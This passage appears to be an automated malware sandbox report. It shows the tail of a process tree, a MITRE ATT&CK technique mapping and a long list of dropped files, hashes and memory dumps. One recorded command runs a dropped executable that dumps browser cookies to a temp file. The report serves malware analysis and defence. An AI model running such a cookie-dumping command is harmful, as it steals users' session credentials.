                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:988

                                                                                                                                                                                            Network

                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                            Persistence

                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                            1
                                                                                                                                                                                            T1060

                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                            2
                                                                                                                                                                                            T1112

                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                            1
                                                                                                                                                                                            T1130

                                                                                                                                                                                            Credential Access

                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                            4
                                                                                                                                                                                            T1081

                                                                                                                                                                                            Discovery

                                                                                                                                                                                            Query Registry

                                                                                                                                                                                            3
                                                                                                                                                                                            T1012

                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                            4
                                                                                                                                                                                            T1082

                                                                                                                                                                                            Remote System Discovery

                                                                                                                                                                                            1
                                                                                                                                                                                            T1018

                                                                                                                                                                                            Collection

                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                            4
                                                                                                                                                                                            T1005

                                                                                                                                                                                            Command and Control

                                                                                                                                                                                            Web Service

                                                                                                                                                                                            1
                                                                                                                                                                                            T1102

                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                            Downloads

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                              MD5

                                                                                                                                                                                              1011c0a635c31cca4c6045cbdd218155

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              9c5792671ae6fa3b6b8f81600478d8464543a1fd

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              481589055bec93cf15f904d5c5fedf58d6c1092d89775e7811e37d956b3b0305

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              768a769eef661922a1e07169f34c1ad71d5c961c621d56df2dbf38d73e8bd25b0a08ea91d64044dc237d5e85698bcb42694627a74a37b24dda9a2ccb24cdcdc6

                                                                                                                                                                                            • \??\pipe\crashpad_3152_CALNEXINPCUWNZNG
                                                                                                                                                                                              MD5

                                                                                                                                                                                              d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                            • \??\pipe\crashpad_4840_RWIBEBYEFUDOACBS
                                                                                                                                                                                              MD5

                                                                                                                                                                                              d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                            • memory/344-307-0x00000224AD310000-0x00000224AD382000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              456KB

                                                                                                                                                                                            • memory/344-273-0x00000224ACD70000-0x00000224ACDD7000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/540-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/540-123-0x00007FF840510000-0x00007FF840511000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              4KB

                                                                                                                                                                                            • memory/612-268-0x0000000004A30000-0x0000000004A86000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              344KB

                                                                                                                                                                                            • memory/612-247-0x0000000003160000-0x000000000319A000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              232KB

                                                                                                                                                                                            • memory/804-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/996-252-0x000001DC55270000-0x000001DC552D7000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/1032-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/1112-305-0x0000019FE7E40000-0x0000019FE7EB2000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              456KB

                                                                                                                                                                                            • memory/1112-257-0x0000019FE7160000-0x0000019FE71C7000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/1120-269-0x000001C867490000-0x000001C8674F7000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/1120-246-0x000001C8673D0000-0x000001C867414000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              272KB

                                                                                                                                                                                            • memory/1164-263-0x0000021100500000-0x0000021100567000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/1260-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/1364-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/1368-275-0x000001583B800000-0x000001583B867000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/1380-260-0x00000193E1C80000-0x00000193E1CE7000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/1588-271-0x000002C2F7310000-0x000002C2F7377000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/1844-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/1924-274-0x000001F2A9EB0000-0x000001F2A9F17000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/2280-294-0x0000000000F10000-0x0000000000F11000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              4KB

                                                                                                                                                                                            • memory/2368-301-0x000001FB60470000-0x000001FB604E2000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              456KB

                                                                                                                                                                                            • memory/2368-272-0x000001FB60400000-0x000001FB60467000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/2380-303-0x0000024F7FCB0000-0x0000024F7FD22000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              456KB

                                                                                                                                                                                            • memory/2380-254-0x0000024F7FC40000-0x0000024F7FCA7000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/2412-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/2448-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/2604-299-0x000001CD00840000-0x000001CD008B2000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              456KB

                                                                                                                                                                                            • memory/2604-249-0x000001CD00310000-0x000001CD00377000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/2632-285-0x0000028FA3E00000-0x0000028FA3E72000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              456KB

                                                                                                                                                                                            • memory/2632-284-0x0000028FA3AD0000-0x0000028FA3B1B000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              300KB

                                                                                                                                                                                            • memory/2632-287-0x0000028FA6390000-0x0000028FA6495000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1MB

                                                                                                                                                                                            • memory/2680-291-0x0000000004EE0000-0x0000000004EE1000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              4KB

                                                                                                                                                                                            • memory/2712-265-0x0000023DBEB40000-0x0000023DBEBA7000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/2724-267-0x0000023132F10000-0x0000023132F77000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              412KB

                                                                                                                                                                                            • memory/2732-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/2736-289-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              4KB

                                                                                                                                                                                            • memory/2888-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/3588-135-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/3648-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4124-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4200-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4212-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4220-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4236-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4252-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4256-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4264-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4320-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4364-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4372-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4424-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4500-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4524-245-0x0000000003410000-0x00000000035AC000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1MB

                                                                                                                                                                                            • memory/4632-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4792-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4792-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4800-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4824-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4828-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4840-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4932-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4944-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4956-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4972-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/4988-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5044-187-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5056-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5072-192-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5084-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5088-293-0x0000000004840000-0x0000000004841000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              4KB

                                                                                                                                                                                            • memory/5092-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5100-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5104-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5112-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5116-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5132-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5144-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5204-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5212-286-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3MB

                                                                                                                                                                                            • memory/5216-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5220-283-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              284KB

                                                                                                                                                                                            • memory/5276-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5312-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5324-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5444-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5520-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5564-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5616-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5712-292-0x0000000004E40000-0x000000000533E000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              4MB

                                                                                                                                                                                            • memory/5728-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5772-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5820-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5872-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5908-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5908-277-0x0000000000400000-0x00000000004B3000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              716KB

                                                                                                                                                                                            • memory/5908-276-0x00000000005B0000-0x00000000006FA000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1MB

                                                                                                                                                                                            • memory/5944-288-0x000000001BAB0000-0x000000001BAB2000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              8KB

                                                                                                                                                                                            • memory/5956-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5984-279-0x0000000010000000-0x000000001019E000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1MB

                                                                                                                                                                                            • memory/5984-278-0x0000000004230000-0x0000000004387000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1MB

                                                                                                                                                                                            • memory/6004-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/6012-280-0x0000000000490000-0x00000000005DA000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1MB

                                                                                                                                                                                            • memory/6020-296-0x0000000004EE0000-0x00000000054E6000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              6MB

                                                                                                                                                                                            • memory/6040-282-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              284KB

                                                                                                                                                                                            • memory/6076-290-0x0000000004B90000-0x0000000004B91000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              4KB

                                                                                                                                                                                            • memory/6100-297-0x0000023F923F0000-0x0000023F92410000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              128KB

                                                                                                                                                                                            • memory/6100-295-0x0000023F90A10000-0x0000023F90A30000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              128KB

                                                                                                                                                                                            • memory/6100-281-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              7MB